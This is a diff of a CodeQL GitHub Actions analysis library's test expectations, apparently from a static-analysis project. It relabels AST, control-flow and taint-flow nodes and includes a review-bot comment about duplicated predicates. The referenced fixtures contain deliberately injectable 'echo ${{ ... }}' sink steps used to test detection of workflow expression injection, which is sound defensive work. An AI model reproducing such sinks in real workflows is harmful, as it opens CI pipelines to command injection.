kout@v4 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:12:9:12:12 | with | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:13:11:13:21 | fetch-depth | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:15:9:15:12 | name | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:16:9:16:10 | id | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:17:9:17:12 | uses | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:19:12 | name | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:19:15:19:43 | Remove ... d files | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:20:9:20:10 | id | .github/workflows/test.yml:19:9:26:6 | name: R ... 
d files | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:21:9:21:12 | uses | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:22:9:22:12 | with | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:15:9:15:12 | name | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:9:16:10 | id | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:9:17:12 | uses | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:19:12 | name | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:19:15:19:43 | Remove ... 
d files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:9:20:10 | id | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:9:21:12 | uses | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:22:9:22:12 | with | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:11:23:16 | source | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:24:11:24:14 | find | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:24:17:24:21 | "foo" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:25:11:25:17 | replace | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:25:20:25:21 | "" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:26:9:26:10 | id | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:11:7:31:2 | - uses: ... 
kout@v4 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:26:9:26:10 | id | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... 
kout@v4 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:31:3:31:6 | job2 | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:39:7:40:53 | - id: sink | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:39:9:39:10 | id | .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:7:40:53 | - id: sink | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... 
utput}} | .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:7:40:53 | - id: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:39:10 | id | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:7:40:53 | - id: sink | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | cfgNodes -dfNodes -exprNodes | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:7:10:4 | job_out ... 
alue }} | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:24:17:24:21 | "foo" | +| .github/workflows/test.yml:25:20:25:21 | "" | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +dfNodes +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... 
iles }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +exprNodes +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | argumentNodes | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | usesIds -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | source | -| .github/workflows/test.yml:19:9:26:6 | name: R ... 
d files | step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | nodeLocations -| .github/workflows/test.yml:1:1:40:53 | enter on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | -| .github/workflows/test.yml:1:1:40:53 | exit on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | -| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | -| .github/workflows/test.yml:1:1:40:53 | on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:19:8:49 | .github/workflows/test.yml@8:19:8:49 | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | -| .github/workflows/test.yml:19:9:26:6 | name: R ... 
d files | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:19:23:63 | .github/workflows/test.yml@23:19:23:63 | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... 
utput}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 |
 scopes
 | .github/workflows/test.yml:1:1:40:53 | on: push |
@@ -322,8 +345,8 @@ summaries
 | timheuer/base64-to-file | * | input.fileDir | output.filePath | taint |
 | timheuer/base64-to-file | * | input.fileName | output.filePath | taint |
 calls
-| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | actions/checkout |
-| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | tj-actions/changed-files |
-| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | mad9000/actions-find-and-replace-string |
+| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout |
+| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files |
+| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string |
 needs
 | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} |
diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql
index abdd087590a3..f30db9af92fe 100644
--- a/ql/test/library-tests/test.ql
+++ b/ql/test/library-tests/test.ql
@@ -1,4 +1,4 @@
-import codeql.actions.ast.internal.Actions
+import codeql.actions.ast.internal.Yaml
 import codeql.actions.Ast
 import codeql.actions.Cfg as Cfg
 import codeql.actions.DataFlow
@@ -15,29 +15,29 @@ query predicate stepNodes(Step s) { any() }
 query predicate allUsesNodes(Uses s) { any() }
-query predicate stepUsesNodes(StepUses s) { any() }
+query predicate stepUsesNodes(UsesStep s) { any() }
-query predicate jobUsesNodes(JobUses s) { any() }
+query predicate jobUsesNodes(UsesStep s) { any() }
 query predicate usesSteps(Uses call, string argname, Expression arg) {
- call.getArgumentExpr(argname) = arg
+ call.getArgument(argname) = arg
 }
-query predicate runSteps(Run run, string body) { run.getScript() = body }
+query predicate runSteps(Run run, string body) { run.getScript().getValue() = body }
 query predicate runStepChildren(Run run, AstNode child) { child.getParentNode() = run }
 query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent }
-query predicate cfgNodes(Cfg::Node n) { n.getLocation().getFile().getBaseName() = "test.yml" } //any() }
+query predicate cfgNodes(Cfg::Node n) { any() }
-query predicate dfNodes(DataFlow::Node e) { e.getLocation().getFile().getBaseName() = "test.yml" } //any() }
+query predicate dfNodes(DataFlow::Node e) { any() }
 query predicate exprNodes(DataFlow::Node e) { any() }
 query predicate argumentNodes(DataFlow::ArgumentNode e) { any() }
-query predicate usesIds(StepUses s, string a) { s.getId() = a }
+query predicate usesIds(UsesStep s, string a) { s.getId() = a }
 query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l }
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected
index d31268b12b59..51fb93146859 100644
--- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected
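Review bot: `query predicate jobUsesNodes(UsesStep s) { any() }` is now a verbatim duplicate of `stepUsesNodes` directly above it; swapping `JobUses` for `UsesStep` silently drops the job-level `uses:` (reusable-workflow call) coverage the predicate name promises, and the two predicates will always produce identical expected output. If the library still has a class for job-level `uses:` the predicate should take that class; otherwise remove `jobUsesNodes` rather than keep the duplicate. The same applies to `dfNodes(DataFlow::Node e) { any() }` and `exprNodes(DataFlow::Node e) { any() }`, which now share both signature and body. Loosening `cfgNodes` and `dfNodes` from the `test.yml` filter to `any()` also means every fixture file in the test database contributes to these sections, so each added fixture will churn them; a one-line comment such as `// intentionally unfiltered: every fixture file in the test db is listed` would record that this is deliberate.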
@@ -1,11 +1,11 @@ edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." | -| action1/action.yml:24:7:31:4 | name: Remove foo [value] | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | -| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | action1/action.yml:24:7:31:4 | name: Remove foo [value] | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | +| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | -| action1/action.yml:24:7:31:4 | name: Remove foo [value] | semmle.label | name: Remove foo [value] | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | semmle.label | Uses Step: replace [value] | | action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} | | action1/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected index 23369932e819..7bea4429e562 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected 
@@ -1,12 +1,12 @@ edges -| action1/action.yml:42:7:44:4 | id: changed-files | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | -| action1/action.yml:44:7:48:70 | id: source [tainted] | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | -| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | action1/action.yml:44:7:48:70 | id: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | +| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | nodes | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | semmle.label | ${{ ste ... inted}} | -| action1/action.yml:42:7:44:4 | id: changed-files | semmle.label | id: changed-files | -| action1/action.yml:44:7:48:70 | id: source [tainted] | semmle.label | id: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | subpaths #select -| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | action1/action.yml:42:7:44:4 | id: changed-files | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | Source | +| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | Source | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected index 8ec7f44dba3d..6496731dd6bf 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected 
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected @@ -1,11 +1,11 @@ edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | -| action1/action.yml:37:7:42:4 | id: reflector [reflected] | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | -| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | action1/action.yml:37:7:42:4 | id: reflector [reflected] | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | +| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | semmle.label | ${{ ste ... cted }} | -| action1/action.yml:37:7:42:4 | id: reflector [reflected] | semmle.label | id: reflector [reflected] | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | | action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected index 8e19cd469ab9..8d091b655479 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected 
@@ -1,12 +1,12 @@ edges -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | nodes | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | semmle.label | job-out ... utput}} [job-output2] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | semmle.label | Job outputs node [job-output2] | | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | semmle.label | Uses Step: step2 | subpaths #select -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... 
put2 }} | Source | +| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | Source | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected index f7d715c9fa1a..ae21052dcfe2 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected 
